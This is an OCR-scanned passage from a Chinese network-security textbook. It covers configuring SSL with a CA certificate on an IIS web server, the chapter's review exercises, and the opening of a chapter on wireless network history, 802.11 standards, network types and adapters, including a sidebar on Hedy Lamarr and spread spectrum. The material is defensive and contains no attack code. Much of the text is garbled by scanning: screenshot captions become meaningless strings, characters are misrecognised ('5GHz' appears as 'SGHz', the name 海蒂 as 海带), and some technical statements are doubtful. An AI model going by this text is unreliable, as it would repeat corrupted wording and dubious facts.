“* 保 正 远程 计算 机 的 身份 
『 匡 地 址 和 城 名 限制 
C3 
总 手中 
颁发 给 : 。 192 168.3.20 
广安 全 通信 
< Rg 全 类 者 : 430 
EE 有 效 起 始 日 期 2016-5-11 到 2017-5-11 
_ wo | 家 您 有 一 个 与 该 证 书 对 应 的 私 钥 。 
Lis 3 [3 
到 证 | 取消 | FR | zw | CL 本 | 
图 7-52 ”Web 服务 器 配置 证 书 (1) 图 7-53 ”Web 服务 器 配置 证 书 (2) 
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(2) 编辑 证 书 : 服务 器 已 经 信任 CA 机 构 ， 接 下 来 可 以 建立 SSL 通道 请 求 。 单 击 “ 编 
辑 ” 按 钮 ， 如 图 7-54 所 示 。 

(3) 安全 通信 : 选中 “要 求 安全 通道 (SSL)” 选 项 框 ， 单 击 “ 确 定 ” 按 钮 ，Web 服务 器 
配置 完毕 ， 如 图 7-55 所 示 。 



























































默认 网 站 尾 性 x 
hab 1 -一 | 主 上 录 — 一 -. 
| ITTP 头 | 
身份 验 证 和 访问 控制 
«sb 维基 访问 六 编 可 身份 下放 -一 一 
王 地 址 和 域名 限制 
8 拓 吉 各 权 队 
编辑 
安全 通信 
= a RM Ee). 
厂 启用 证 书信 任 列表 0 
Cssw ] i [mr d 
苛 建 加 ) 编辑 吕 ) 
|||。 出 Cee ] mw | www | 
图 7-54 Web 服务 器 配置 证 书 (3) 图 7-55 Web 服务 器 配置 证 书 (4) 


(4) 此 时 刷新 证 书 申请 页 面 或 者 你 的 网 站 页 面 ， 就 可 以 看 到 安全 警报 页 面 ， 因 为 我 们 
强制 要 求 使 用 HTTPS 来 访问 网 站 了 ， 如 图 7-56 所 示 。 
和 注意 : 如 果 不 是 整个 网 站 要 求 使 用 HTTPS， 也 可 以 针对 一 个 虚拟 目录 进行 设置 ， 方 
法 同上 。 
ET 证 书 服务 - Nicres 
文件 四 ” 蝙 辑 于 ) 查看 WW 收 亦 Q) 工具 GD) 帮助 0 
回忆 - 曲 - 同 加 的 | 站 搜索 立 收 戈 天 丰 拒 体 克 | -> 电 


地 址 加 | 乱 https:/7192. 168.3.20/certsrv/ 
1Cr0 服 | 





oft Internet Erplorer 































查看 挂 起 的 证 书 申请 的 状态 
下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 岂 








Cal 本 


图 7-56 ”Web 服务 器 配置 证 书 (5) 
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(5) 使 用 https://your-ip 或 https://your-domainname( 域 名 地 址 )， 就 可 以 让 用 户 安全 访问 
网 站 了 ， 如 图 7-57 所 示 。 






文件 加“ 编 缉 四 查看 W， 收藏 从。 工具 上 帮助 中 
四 搬 -加 -品目 四 | 万 规 要 去 收 成 严 好 提 体 如 | -之 

















到 icrosoft 证 书 服务 -- 4F 


使 用 此 网 站 为 您 的 Web 浏览 器 ， 电 子 邮 件 客户 端 或 其 他 程序 申请 一 个 证 必 
署 并 加 密 邮 件 ， 并 且 ， 根 据 您 申请 的 证 书 的 类 型 ， 执 行 其 他 安全 任务 。 


您 也 可 以 使 用 此 网 站 下 载 证 书 颁发 机 构 (CA) 证 书 ， 证 书 链 ， 或 证 书 吊 销 列 | 
有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . 
选择 一 个 任务 : 

申请 一 个 证 书 

查看 挂 起 的 证 书 申请 的 状态 

下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 


‘| 加 ] 上 


7-57 ”Web 服务 器 配置 证 书 (6) 














本 章 小 结 


本 章 在 对 Web 安全 的 基础 内 容 和 安全 问题 进行 概述 性 介绍 的 基础 上 ， 重 点 讲述 了 
Web 服务 器 的 安全 及 防范 配置 ， 接 着 介绍 了 Web 客户 端的 安全 防范 ， 最 后 以 一 个 具体 的 
配置 过 程 ， 详 细 阑 述 了 利用 CA 证 书 和 SSL 安全 协议 构建 Web 服务 器 的 安全 配置 应 用 。 


习 是 
一 、 简 答题 
1. 简 述 Web 安全 的 定义 和 现状 原因 。 
2. Web 服务 器 中 存在 的 漏洞 有 哪些 ? 
3. 什么 是 ActiveX 控件 ? 如 何 对 ActiveX 控件 进行 安全 设置 ? 
4. 什么 是 Cookie? Cookie 的 功能 有 哪些 ? 如 何 查看 和 删除 Cookie? 
5. 什么 是 IIS? 简 述 它 的 功能 。 
6. 简 述 在 IIS 中 Web 站 点 的 创建 过 程 。 
7 如 何在 一 台 Windows 2008 Server 计算 机 上 运行 多 个 Web 站 点 ? 
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二 、 案 例 操作 题 


搭建 一 个 Web 网 站 服务 器 。 

新 建 一 个 Web 站 点 ， 并 利用 IIS 发 布 该 站 点 。 

配置 Web 服务 器 ， 使 建 好 的 站 点 不 允许 用 户 匿 名 访问 。 

配置 Web 服务 器 ， 使 建 好 的 站 点 不 允许 地 址 192.168.1.100 访问 。 

架设 一 个 CA 证 书 服务 器 。 

利用 CA 证 书 服务 器 和 SSL 安全 协议 构建 该 站 点 为 一 个 安全 的 Web 服务 器 站 点 。 


i 
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【项 目 要 点 】 

@ ”无 线 网络 安全 技术 。 

@ 无线 网 络 安全 配置 。 
【学 习 目 标 】 

了 解 无 线 网 络 安 全 面临 的 挑战 。 
熟悉 无 线 网 络 的 入 侵 方 式 。 
掌握 无 线 网 络 主要 安全 技术 。 
掌握 无 线 网 络 安全 配制 方法 。 


8.1 无 线 网 络 基础 


随 着 智能 手机 的 普及 、 无 线 通信 技术 的 飞速 发 展 ， 无 线 网 络 对 人 们 日 常生 活 的 影响 越 
来 越 大 。 无 线 传输 介质 摆脱 了 有 线 介 质 的 束缚 ， 信 息 可 以 在 信号 覆盖 区 域内 的 任何 角落 轻 
松 传递 。 然 而 用 户 随时 随地 能 够 享用 的 无 线 大 餐 也 被 恶意 入 侵 者 岗 钥 ， 无 线 网 络 的 便利 性 
同样 适用 于 恶意 入 侵 者 ， 在 无 线 网 络 环境 中 他 们 能 更 容易 地 入 侵 和 伪装 ， 无 线 网 络 爆 出 的 
安全 问题 也 已 不 容 小 视 。 


8.1.1 无 线 网 络 的 发 展 


1. 移动 通信 网 络 


无 线 网 络 的 历史 起 源 可 以 追溯 到 第 二 次 世界 大 战 期 间 。 截 至 目前 ， 移 动 通信 网 络 已 经 
过 4 代 发 展 ， 第 五 代 通 信 网 络 也 已 在 多 个 国家 开始 实验 ， 预 计 2020 年 大 规模 投入 商用 。 

(1) 第 一 代 (1G) 移 动 通信 系统 。20 世纪 70 年 代 诞 生 的 模拟 蜂窝 移动 通信 系统 。1G 系 
统 采用 模拟 信号 传输 方式 实现 语音 业务 ， 使 用 频 分 多 址 FDMA 接 入 技术 划分 信道 。 

(2) 第 二 代 (2G) 移 动 通信 网 。 由 于 1G 系统 存在 频谱 利用 率 低 、 语 音质 量 差 、 接 入 容 
量 小、 保密 性 差 和 不 能 提供 数据 通信 服务 等 先天 不 足 ， 目 前 已 被 数字 蜂 房 移动 通信 系统 取 
代 ， 形 成 了 覆盖 全 球 的 第 二 代 (2G) 移 动 通 信和 网 。2G 移动 通信 系统 主要 有 : 全 球 移动 通信 系 
统 GSM(Global System for Mobile Communication) 和 码 分 多 址 CDMA(Code Division Multiple 
Access) 两 大 移动 通信 标准 。 

(3) 第 三 代 (3G) 蜂 窜 移 动 通信 网 。 国 际 电信 联盟 ITU 早 在 1985 年 就 提出 了 第 三 代 (3G) 
移动 通信 的 雏形 。 因 此 ， 统 一 标准 和 频段 、 提 高 频谱 利用 率 和 支持 多 媒体 移动 通信 正 是 
3G 移动 通信 与 2G 的 主要 区 别 。 欧 洲 提 出 的 宽带 WCDMA 采用 频 分 双 工 FDD(Frequency 
Division Duplex) 信 道 。WCDMA 的 支持 者 主要 是 欧洲 、 日 本 等 国家 的 GSM 网 络 运营 商 和 
生产 厂商 ， 能 够 在 现 有 GSM 网 络 基础 上 ， 经 过 GPRS 逐步 过 渡 到 3G 移动 通信 。3G 通信 
制式 还 包括 CDMA2000 和 TD-SCDMA。 

(4) 第 四 代 (4G) 移 动 电话 行动 通信 网 。4G 移动 通信 技术 包括 TD-LTE 和 FDD-LTE 两 
种 制式 。4G 网 络 是 集 3G 网 络 与 WLAN 于 一 体 ， 并 能 够 快速 传输 数据 、 高 质量 音频 、 视 
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频 和 图 像 等 。4G 能 够 以 100Mbps 以 上 的 速度 下 载 ， 并 能 够 满足 几乎 所 有 用 户 对 于 无 线 服 
务 的 要 求 。 此 外 ，4G 可 以 在 DSL 和 有 线 电视 调制 解 调 器 没有 覆盖 的 地 方 部 署 ， 然 后 再 扩 
展 到 整个 地 区 。 很 明显 ，4G 有 着 不 可 比拟 的 优越 性 。 


2. 无 线 计算 机 网 络 


ALOHAnet 是 世界 上 最 早 的 无 线 电 计算 机 通信 网 。 它 是 1968 年 美国 夏威夷 大 学 的 一 
项 研究 计划 的 名 字 ， 是 一 种 使 用 无 线 广播 技术 的 分 组 交换 计算 机 网 络 ， 也 是 最 早 、 最 基本 
的 无 线 数据 通信 协议 。 取 名 ALOHA， 是 夏威夷 人 表示 致意 的 问候 语 ， 这 项 研究 计划 的 目 
的 是 要 解决 夏威夷 群岛 之 间 的 通信 问题 。ALOHA 网 络 可 以 使 分 散在 各 岛 的 多 个 用 户 通过 
无 线 电 信道 来 使 用 中 心计 算 机 ， 从 而 实现 一 点 到 多 点 的 数据 通信 。 

ALOHAnet 使 用 了 新 的 介质 访问 技术 (ALOHA 随机 接触 ，ALOHA 的 一 种 协议 )。 在 20 
世纪 70 年 代 ， 美 国 并 没有 为 计算 机 通信 分 配 无 线 电 频 段 ， 所 以 ALOHAnet 同时 使 用 了 实 
验 性 质 的 特 高 频 无 线 电波 作为 通信 频段 。 

20 世纪 80 年 代 早期 ， 美 国 为 移动 通信 网 络 分 配 了 频段 ，1985 年 WiFi 拥有 了 自己 的 
频段 。 这 样 就 可 以 通过 移动 通信 网 络 和 WiFi 来 使 用 ALOHAnet。 

在 1G( 第 一 代 ) 移 动 通信 手机 中 ，ALOHA 频道 仅 用 于 信号 生成 和 控制 ， 到 20 世纪 80 
年 代 末 ， 欧 洲 标准 化 组 织 的 GSM 数字 移动 通信 技术 (第 二 代 移 动 通信 技术 的 一 种 ) 扩 大 了 通 
过 ALOHA 频道 访问 移动 电话 系统 的 无 线 电 频 道 的 应 用 。 另 外 ，2G 通信 中 可 以 使 用 
短信 。 

3. 蓝牙 Bluetooth 


蓝牙 技术 最 初 由 电信 巨头 爱立信 公司 于 1994 年 创制 ， 当 时 是 作为 RS232 数据 线 的 替 
代 方 案 。 蓝 牙 可 连接 多 个 设备 ， 克 服 了 数据 同步 的 难题 。 该 技术 可 实现 固定 设备 、 移 动 设 
备 和 楼 宇 个 人 域 网 之 间 的 短 距 离 数据 交换 (使 用 2.4 一 2.485GHz 的 ISM 波段 的 UHF 无 线 
电波 )。 

如 今 蓝牙 由 蓝牙 技术 联盟 (Bluetooth Special Interest Group，SIG) 管 理 。 蓝 牙 技 术 联盟 
在 全 球 拥 有 超过 25 000 家 成 员 公 司 ， 它 们 分 布 在 电信 、 计 算 机 、 网 络 和 消费 电子 等 多 个 领 
域 。IEEE 将 蓝牙 技术 列 为 IEEE 802.15.1， 但 如 今 已 不 再 维持 该 标准 。 蓝 牙 技 术 联 盟 负责 
监督 蓝牙 规范 的 开发 ， 管 理 认 证 项 目 ， 并 维护 商标 权益 。 制 造 商 的 设备 必须 符合 蓝牙 技术 
联盟 的 标准 才能 以 “蓝牙 设备 ”的 名 义 进入 市 场 。 蓝 牙 技术 拥有 一 套 专利 网 络 ， 可 发 放 给 
符合 标准 的 设备 。 

4. 802.11 与 WiFi 


802.11 协议 簇 是 国际 电工 电子 工程 学 会 (I[EEE) 为 无 线 局 域 网 络 制定 的 标准 。1999 年 ， 
802.11a 定义 了 一 个 在 5GHz 的 ISM 频段 上 的 数据 传输 速率 可 达 54Mbps 的 物理 层 ， 
802.11b 定义 了 一 个 在 2.4GHz 的 ISM 频段 上 但 数据 传输 速率 高 达 11Mbps 的 物理 层 。 
2.4GHz 的 ISM 频段 为 世界 上 绝 大 多 数 国家 通用 ， 因 此 802.11b 得 到 了 最 为 广泛 的 应 用 。 苹 
果 公 司 把 自己 开发 的 802.11 标准 叫 作 AirPort。 

1999 年 工业 界 成 立 了 WiFi 联盟 ， 致 力 解决 符合 802.11 标准 的 产品 的 生产 和 设备 兼容 
性 问题 。 与 蓝牙 技术 一 样 ，WiFi 同属 于 在 办 公 室 和 家 庭 中 使 用 的 短 距 离 无 线 技术 。 该 技术 
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使 用 的 是 2.4GHz 附近 的 频段 ， 该 频段 目前 尚 属 没 有 许可 的 无 线 频段 。 其 目前 可 使 用 的 标 
准 有 两 个 ， 分 别 是 IEEE 802.11a 和 IEEE 802.11b。 在 信号 较 弱 或 有 干扰 的 情况 下 ， 带 宽 可 
调整 为 5.5Mbps、2Mbps 和 1Mbps。 带 宽 的 自动 调整 ， 有 效 地 保障 了 网 络 的 稳定 性 和 可 
靠 性 。 


【知识 拓展 一 一 CDMA 的 诞生 】 


海 蒂 。 拉 玛 生 于 1914 年 11 月 9 日 , 于 2000 年 1 月 19 日 泊 世 。 在 20 世纪 30 年 代 
初 ，10 多 岁 的 她 因为 惊人 的 美丽 被 一 位 美国 导演 发 握 ， 从 此 便 踏 入 好 莱 坞 。 作 为 出 身 显 
赫 、 与 各 国 军 方 高 层 私交 甚 好 的 好 菜 坞 巨星 ， 曾 被 誉 为 是 全 世界 最 美丽 的 女人 ， 她 同时 有 
另 一 项 宝贵 财富 一 一 为 当今 大 热 的 通信 技术 LAN 和 手机 移动 通信 技术 商定 了 基础 ， 永 远 留 
给 并 造福 于 后 人 。 
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海带 。 拉 玛 的 第 一 任 丈 夫 曼 德尔 是 奥地利 军用 设备 制造 商 ， 其 供给 对 象 正 是 二 战 时 期 
的 轴 心 国 。 在 日 常 与 纳粹 集团 的 密切 接触 过 程 中 ， 拉 玛 对 国防 设备 产生 了 浓厚 的 兴趣 ， 她 
不 仅 有 机 会 得 知 最 新 的 导弹 装备 ， 同 时 也 能 了 解 到 国防 研发 中 院 待 解决 的 问题 ， 比 如 ， 如 
何 避 免 通信 信号 在 传输 过 程 中 被 敌 方 干扰 或 截获 。 

二 战 时 ， 如 何 提高 鱼雷 命中 率 成 为 各 方 争夺 的 焦点 。 实 战 中 ， 通 常 是 由 战舰 和 潜水 艇 
向 打击 目标 发 射 鱼雷 ， 指 挥 员 在 飞机 或 轮船 上 通过 无 线 信号 进行 引导 ， 以 保证 精准 的 命 
中 。 因 为 早期 的 通信 同时 在 一 个 单独 的 频道 上 传输 ， 敌 方 只 需 简 单 地 探 察 频道 ， 之 后 制造 
足够 的 电磁 噪声 就 能 有 效 地 干扰 信号 。 

恰巧 此 时 美国 政府 和 国家 发 明 家 委员 会 向 各 界 名 流 发 出 邀请 ， 和 希望 每 个 有 能 力 和 想法 
的 人 加 入 支持 美军 参战 的 队伍 中 。 海 蒂 小 姐 正 好 了 解 适 控 鱼 雷 和 无 线 通 信和 干扰 技 术 ， 她 积 
极地 参与 了 设计 军用 无 线 通信 和 鱼雷 适 控 系统 。 

海 蒂 小 姐 的 设想 是 : 在 鱼雷 发 射 和 接收 两 端 ， 同 时 用 数 个 窜 频 信道 传播 信号 ， 这 些 信 
号 按 一 个 随机 的 信道 序列 发 射出 去 ， 接 收 端 则 按 相 同 的 顺序 将 离散 的 信号 组 合 起 来 。 这 样 
一 来 ， 对 于 不 知 信道 序列 的 接收 方 来 说 ， 接 收 到 的 信号 就 是 噪声 。 与 此 同时 ， 由 于 接收 端 
只 对 数 个 特殊 频段 的 特定 序列 信号 敏感 ， 对 一 般 的 噪声 免疫 力 很 好 。 而 敌 方 又 不 可 能 实现 
全 频段 的 干扰 。 在 此 基础 之 上 ， 海 蒂 与 当时 闻名 遐 途 的 先锋 派 作曲 家 安泰 尔 一 起 研究 了 如 
何 把 信息 分 段 存储 在 不 同 频率 上 以 获得 更 好 的 抗 干 扰 能 力 ， 这 就 是 “ 扩 频 通信 技术 ”的 构 
想 ， 也 是 CDMA 的 基本 思路 。1942 年 8 月 ， 这 项 发 明 在 美国 被 授予 专利 。 拉 玛 和 安泰 尔 
将 这 项 专利 送 给 美国 政府 ， 但 这 一 技术 当时 并 没有 引起 美国 军 方 的 足够 重视 。 

冷战 结束 后 ， 美 军 解 除了 对 “ 扩 频 ”技术 的 管制 ， 允 许 其 商业 化 。 在 “ 扩 频 ”技术 基 
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础 上 ，1985 年 ， 美 国 高 通 公 司 研发 出 CDMA 无 线 数字 通信 系统 ， 但 CDMA 的 技术 鼻祖 海 
蒂 。 拉 玛 却 差点 被 人 遗忘 。 直 到 1997 年 ， 以 CDMA 为 基础 的 3G 技术 走 入 人 们 的 视野 ， 
科学 界 才 想起 了 这 位 已 经 83 岁 高 龄 的 “ 扩 频 之 母 ”， 美 国电 子 前 沿 基 金 会 授予 拉 玛 迟 来 
的 荣誉 。 但 此 时 专利 已 经 失效 ， 所 以 她 终生 都 未 能 从 自己 的 发 明 中 得 利 。 

今天 ， 拉 玛 发 明 的 这 项 技术 还 被 广泛 应 用 于 卫星 定位 系统 (如 GPS)、 军 方 通信 密码 、 
航天 飞机 对 地 交流 以 及 WiFi 等 领域 。 


8.1.2 ”无线 计 算 机 网 络 的 分 类 


按照 无 线 网 络 的 覆盖 和 应 用 空间 范围 ， 可 以 将 无 线 网 络 分 为 以 下 几 种 。 
1. WPAN 一 一 无 线 个 人 网 


无 线 个 人 网 (Wireless Personal Area Networks) 通 常 是 指 将 触手 可 及 的 设备 通过 无 线 网 络 
连接 在 一 起 。WPAN 位 于 整个 网 络 链 的 末端 ， 用 于 实现 同一 地 点 终端 与 终端 间 的 连接 ， 如 
连接 手机 和 蓝牙 耳机 等 。WPAN 所 覆盖 的 范围 一 般 在 10m 半径 以 内 ， 必 须 运 行 于 许可 的 
无 线 频段 。WPAN 设备 具有 价格 便宜 、 体 积 小 、 易 操作 和 功 耗 低 等 优点 。 在 过 去 的 几 年 
里 ，WPAN 技术 得 到 了 飞速 的 发 展 ， 蓝 牙 、UWB、Zigbee、RFID、Z-Wave、NFC 以 及 
Wibree 等 各 种 技术 竞相 提出 ， 在 功 耗 、 成 本 、 传 输 速率 、 传 输 距 离 、 组 网 能 力 等 方面 又 各 
有 特点 。 


2. WLAN 一 一 无 线 局 域 网 


无 线 局 域 网 (Wireless Local Area Network) 在 近年 来 几乎 成 为 大 多 数 人 办 公 、 娱 乐 、 学 
习 和 生活 的 必需 品 。 无 线 局 域 网 通过 扩展 频谱 、 正 交 频 分 复 用 (OFDM) 等 无 线 分 配 的 方法 
将 多 个 无 线 设备 连接 在 网 络 中 ， 这 些 方法 可 以 保证 用 户 设备 在 信号 覆盖 区 域内 移动 时 不 掉 
线 。 无 线 局 域 网 中 最 出 名 的 协议 集 是 802.11， 而 基于 802.11 产生 的 WiFi 又 是 被 广 为 熟 知 
的 短 距 离 无 线 通信 技术 。 

在 实际 应 用 中 ，WLAN 的 接 入 方式 很 简单 。 以 家 庭 WLAN 为 例 ， 只 需 一 个 无 线 接 入 
设备 一 一 路 由 器 ， 一 个 具备 无 线 功 能 的 计算 机 或 终端 (手机 或 PAD)， 没 有 无 线 功能 的 计算 
机 只 需 外 插 一 个 无 线 网 卡 即 可 。 有 了 以 上 设备 后 ， 具 体操 作 如 下 : 使 用 路 由 器 将 热点 (其 他 
己 组 建 好 且 在 接收 范围 的 无 线 网 络 ) 或 有 线 网 络 接 入 家 庭 ， 按 照 网 络 服务 商 提供 的 说 明 书 进 
行路 由 配置 ， 配 置 好 后 在 家 中 覆盖 范围 内 (WLAN 稳定 的 覆盖 范围 大 概 在 20 一 50m) 放 置 接 
收 终端 ， 打 开 终 端的 无 线 功 能 ， 输 入 服务 商 给 定 的 用 户 名 和 密码 即 可 接 入 WLAN。 


3. Mesh network 一 一 无 线 多 跳 网 络 


在 传统 的 无 线 局 域 网 中 ， 每 个 客户 端 均 通 过 一 条 与 AP(Access Point， 接 入 点 ， 也 称 访 
问 点 ) 相 连 的 无 线 链 路 来 访问 网 络 ， 形 成 一 个 局 部 的 BSS(Basic Service Set， 基 本 服务 集 )。 
用 户 如 果 要 进行 相互 通信 的 话 ， 必 须 首 先 访 问 一 个 固定 的 接 入 点 (AP)， 这 种 网 络 结构 被 称 
为 单 跳 网 络 。 而 在 无 线 Mesh 网 络 中 ， 任 何 无 线 设备 节点 都 可 以 同时 作为 AP 和 路 由 器 ， 
网 络 中 的 每 个 节点 都 可 以 发 送 和 接收 信号 ， 每 个 节点 都 可 以 与 一 个 或 者 多 个 对 等 节点 进行 
直接 通信 。 这 种 结构 的 最 大 好 处 在 于 : 如 果 最 近 的 AP 由 于 流量 过 大 而 导致 拥塞 的 话 ， 那 
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么 数据 可 以 自动 重新 路 由 到 一 个 通信 流量 较 小 的 邻近 节点 进行 传输 。 依 此 类 推 ， 数 据 包 还 
可 以 根据 网 络 的 情况 ， 继 续 路 由 到 与 之 距离 最 近 的 下 一 个 节点 进行 传输 ， 直 到 到 达 最 终 目 
的 地 为 止 。 这 样 的 访问 方式 就 是 多 跳 访 问 。Internet 就 是 一 个 Mesh 网 络 的 典型 例子 。 


4. WMAN 一 一 无 线 城 域 网 


无 线 城 域 网 (Wireless Metropolitan Area Networks) 由 多 个 无 线 局 域 网 组 成 。 无 线 城 域 网 
中 基于 802.16 标准 的 WiMAX( 全 球 微波 互联 接 入 ) 技 术 是 一 项 新 兴 的 宽带 无 线 接 入 技术 ， 
能 提供 面向 互联 网 的 高 速 连 接 ， 理 论 上 数据 传输 距离 最 远 可 达 50km。 


5. WWAN 一 一 无 线 广域网 


无 线 广域网 (Wireless Wide Area Networks) 覆 盖 于 城镇 之 间 。 两 个 连接 点 之 间 通 常 使 用 
“大 锅 ” 发 射 和 接收 2.4GHz 的 微波 信号 。 

其 他 更 大 的 无 线 网 络 还 有 全 球 区 域 无 线 网 络 和 太空 网 络 。 本 章 的 主要 针对 计算 机 的 无 
线 局 域 网 的 技术 和 安全 。 


8.1.3 无线 局 域 网 络 的 标准 


目前 常用 的 无 线 网 络 标准 主要 有 美国 IEEE(The Institute of Electrical and Electronics 
Engineers， 电 气 和 电子 工程 师 协 会 ) 所 制定 的 802.11 标准 (包括 802.11a 、802.11b 及 
802.11g 等 标准 )， 蓝 牙 (Bluetooth) 标 准 以 及 HomeRF( 家 庭 网 络 ) 标 准 等 。 


1: 802.11 


IEEE 802.11 是 美国 电气 电子 工程 师 协会 (EEE) 为 解决 无 线 网 路 设备 互 连 ， 于 1997 年 
6 月 发 布 的 无 线 局 域 网 标准 。 该 标准 是 IEEE 制定 的 第 一 个 无 线 局 域 网 标准 ， 主 要 用 于 解决 
办 公 室 局 域 网 和 校园 网 中 用 户 与 用 户 终端 的 无 线 接 入 ， 业 务 主要 限于 数据 访问 。802.11 定 
义 了 媒体 访问 控制 层 (MAC 层 ) 和 物理 层 。 物 理 层 定义 了 工作 在 2.4GHz 的 ISM 频段 上 的 两 
种 展 频 调频 方式 和 一 种 红外 传输 的 方式 ， 总 数据 传输 速率 设计 为 2Mbps。 两 个 设备 之 间 的 
通信 可 以 按 设备 到 设备 (ad hoc) 的 方式 进行 ， 也 可 以 在 基站 (Base Station，BS) 或 者 接 入 点 
(Access Point，AP) 的 协调 下 进行 。 为 了 在 不 同 的 通信 环境 下 取得 良好 的 通信 质量 ， 采 用 
CSMA/CA(Carrier Sense Multiple Access/Collision Avoidance) 硬 件 沟 通 方式 。 


2. 802.11 协议 簇 


由 于 801.11 在 速率 和 传输 距离 上 都 不 能 满足 人 们 的 需要 ， 因 此 ，IEEE 小 组 又 相继 推 
出 了 802.11a 和 802.11b 两 个 新 标准 。802.11a 标准 使 用 SGHz 频段 ， 支 持 的 最 大 速度 为 
54Mbps; 而 802.11b 标准 使 用 2.4GHz 频段 ， 支 持 最 大 11Mbps 的 速度 。1999 年 工业 界 成 
立 了 Wi-Fi 联盟 ， 致 力 解决 符合 802.11 标准 的 产品 的 生产 和 设备 兼容 性 问题 。 下 面 是 
802.11 协议 簇 中 的 主要 协议 : 

802.11a: 使 用 5GHz 频段 ， 传 输 速度 为 54Mbps， 与 802.11b 不 兼容 。 

802.11b: 使 用 2.4GHz 频段 ， 传 输 速度 为 11Mbps。 

802.11g: 使 用 2.4GHz 频段 ， 传 输 速 度 主 要 有 54Mbps、108Mbps， 可 向 下 兼容 
802.11b。 
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802.11n: 使 用 2.4GHz、5GHz 两 个 频段 ， 传 输 速 度 一 般 为 300Mbps， 最 大 可 达 
600Mbps， 可 工作 在 2.4GHz 和 5GHz 两 个 频段 。 

802.11ac: 作为 802.11n 的 继任 者 ， 在 802.11n 无 线 标准 于 2009 年 获得 IEEE 标准 委员 
会 正式 批准 后 ，11ac 标准 就 已 经 开始 着 手 制定 。802.11ac 的 核心 技术 主要 基于 802.11a， 
继续 工作 在 5.0GHz 频段 上 以 保证 向 下 兼容 性 ， 但 数据 传输 通道 会 大 大 扩充 ， 在 当前 
20MHz 的 基础 上 增 至 40MHz 或 者 80MHz， 甚 至 有 可 能 达到 160MHz。 再 加 上 大 约 10% 的 
实际 频率 调制 效率 提升 ， 新 标准 的 理论 传输 速度 最 高 有 望 达到 1Gbps， 是 802.11n 300Mbps 
的 三 倍 多 。 


【知识 拓展 一 一 双 频 路 由 器 】 


大 多 数 用 户 所 使 用 的 无 线 网 络 ， 都 运行 在 2.4GHz 频段 。 同 时 ，2.4GHz 频段 中 还 运行 
着 无 线 键 筷 、 无 线 耳 机 、 蓝 牙 设备 等 ， 使 这 一 频段 非常 拥挤 。 所 以 在 使 用 工作 在 2.4GHz 
频段 的 无 线路 由 器 时 ， 时 常 有 无 线 信号 不 住 、 网 络 阻塞 、 频 繁 掉 线 等 问题 出 现 。5GHz 的 
快速 传输 、 较 少 的 干扰 和 噪音， 可 以 让 用 户 获 得 更 高 级 的 网 络 体验 。 

双 频 搭配 、 各 司 其 职 成 为 目前 5GHz 主要 的 应 用 方式 。 用 户 的 一 些 基本 网 络 行为 如 收 
发 邮件 、 浏 览 网 页 、 聊 天 等 可 以 通过 2.4GHz 频段 来 进行 ; 进行 在 线 游 戏 或 者 高 清 影音 娱 
乐 时 ， 最 好 切换 到 SGHz 频段 来 进行 ， 从 而 获得 更 快 的 实际 体验 。 目前， 无 论 是 iPhone、 
iPad 还 是 其 他 旗舰 型 移动 设备 ， 都 已 经 能 够 支持 SGHz 频段 。 

目前 很 多 配备 双 频 的 路 由 器 都 采用 了 5GHz 的 802.11ac 标准 ， 越 来 越 多 的 移动 设备 配 
备 了 802.1lac 网 卡 。 无 论 是 作为 家 庭 数据 中 心 还 是 娱乐 中 心 ，802.1lac 技术 相 较 于 
802.11n 无 线 技术 来 说 ， 优 势 是 非常 大 的 。 而 对 于 5GHz 频段 来 说 ，2.4GHz 频段 由 于 频率 
较 低 、 和 覆盖 范围 较 广 ， 并 且 拥 有 较 强 的 穿 透 能 力 ， 所 以 又 不 能 够 在 短期 内 抛弃 ， 所 以 很 多 
路 由 器 都 配备 了 双 频 功能 。 


8.1.4 ”无线 网 络 设备 


1. 无 线 网 卡 


无 线 网 卡 的 作用 类 似 于 以 太 网 中 的 网 卡 ， 作 为 无 线 局 域 网 的 接口 ， 实 现 与 无 线 局 域 网 
的 连接 。 根 据 接口 类 型 的 不 同 ， 无 线 网 卡 主要 分 为 三 种 类 型 ， 即 PCMCIA 无 线 网 卡 、PCI 
和 PCIe 无 线 网 卡 、 无 线 NIC 网 卡 、USB 无 线 网 卡 。 

(1) PCMCIA 无 线 网 卡 仅 适 用 于 笔记 本 电脑 ， 支 持 热 插 拔 ， 可 以 非常 方便 地 实现 移动 
无 线 接 入 ， 如 图 8-1 所 示 。 只 是 它们 使 用 笔记 本 型 电脑 的 PC 卡 播 槽 。 同 桌面 计算 机 相 
似 ， 可 以 使 用 外 部 天 线 来 加 强 PCMCIA 无 线 网 卡 。 

(2) PCI 和 PCIe 无 线 网 卡 适 用 于 普通 的 台式 计算 机 ， 如 图 8-2 所 示 。 其 实 PCI 无 线 网 
卡 只 是 在 PCI 转 接 卡 上 插入 一 块 普通 的 PCMCIA 卡 。 

(3) 无 线 NIC 与 其 他 的 网 卡 相 似 ， 不 同 的 是 ， 它 通过 无 线 电波 而 不 是 物理 电缆 收发 数 
据 。 无 线 NIC 为 了 扩大 它们 的 有 效 范围 需要 加 上 外 部 天 线 。 当 AP 变 得 负载 过 大 或 信号 减 
弱 时 ，NIC 能 更 改 与 之 连接 的 访问 点 AP， 自 动 转换 到 最 佳 可 用 的 AP， 以 提高 性 能 。 

(4) USB 接口 无 线 网 卡 适用 于 笔记 本 和 人 台式 机 ， 支 持 热 插 拔 。 如 果 网 卡 外 置 有 无 线 天 
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线 ， USB 接口 就 是 一 个 比较 好 的 选择 。 





(a) (b) 
8-1 PCMCIA 无 线 网 卡 


Re 


(b) 





8-2 PCI 和 PCle 无 线 网 卡 


2. 无 线 访问 点 一 AP 


AP 的 英文 全 称 是 Access Point， 意 为 “无 线 访问 点 ”或 “无 线 接 入 点 ”， 通 过 它 ， 能 
把 带 有 无 线 网 卡 的 机 器 接 入 到 网 络 中 来 。 它 主要 提供 从 无 线 工 作 站 到 有 线 局 域 网 和 从 有 线 
局 域 网 对 无 线 工 作 站 的 访问 ， 在 访问 接 入 点 覆盖 范围 内 的 无 线 工作 
站 可 以 通过 它 进行 相互 通信 。 通 俗 地 讲 ， 无 线 AP 是 无 线 网 和 有 线 网 
之 间 沟 通 的 桥梁 。 由 于 无 线 AP 的 覆盖 范围 是 一 个 向 外 扩散 的 圆 形 区 [op 
域 ， 因 此 ， 应 当 尽量 把 无 线 AP 放置 在 无 线 网 络 的 中 心 位 置 ， 而 且 各 A 
无 线 客户 端 与 无 线 AP 的 直线 距离 最 好 不 要 超过 太 远 ， 以 避免 因 通信 WA 
